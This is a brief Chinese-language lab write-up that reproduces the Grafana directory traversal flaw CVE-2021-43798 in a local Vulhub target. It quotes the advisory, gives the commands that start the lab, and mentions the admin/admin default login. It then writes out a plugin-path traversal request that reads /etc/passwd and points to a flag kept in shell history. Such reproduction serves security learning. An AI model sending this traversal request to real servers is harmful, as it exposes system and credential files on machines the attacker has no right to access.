grafana 目录遍历(CVE-2021-43798)漏洞复现
漏洞描述:
Grafana 是一个用于监控和可观察性的开源平台。Grafana 版本 8.0.0-beta1 到 8.3.0(补丁版本除外)容易受到目录遍历,允许访问本地文件。易受攻击的 URL 路径是:<grafana_host_url>/public/plugins//,其中是任何已安装插件的插件 ID。Grafana Cloud 在任何时候都不会受到攻击。建议用户升级到补丁版本 8.0.7、8.1.8、8.2.7 或 8.3.1。GitHub 安全公告包含有关易受攻击的 URL 路径、缓解措施和披露时间表的更多信息。
启动Vulhub靶场镜像
cd /vulhub/grafana/CVE-2021-43798
docker-compose up -d
访问靶机环境
admin/admin弱密码登录
获取一个登录后的GET包并修改url
/public/plugins/welcome/…/…/…/…/…/…/…/…/…/etc/passwd
最终的flag藏在grafana的历史命令里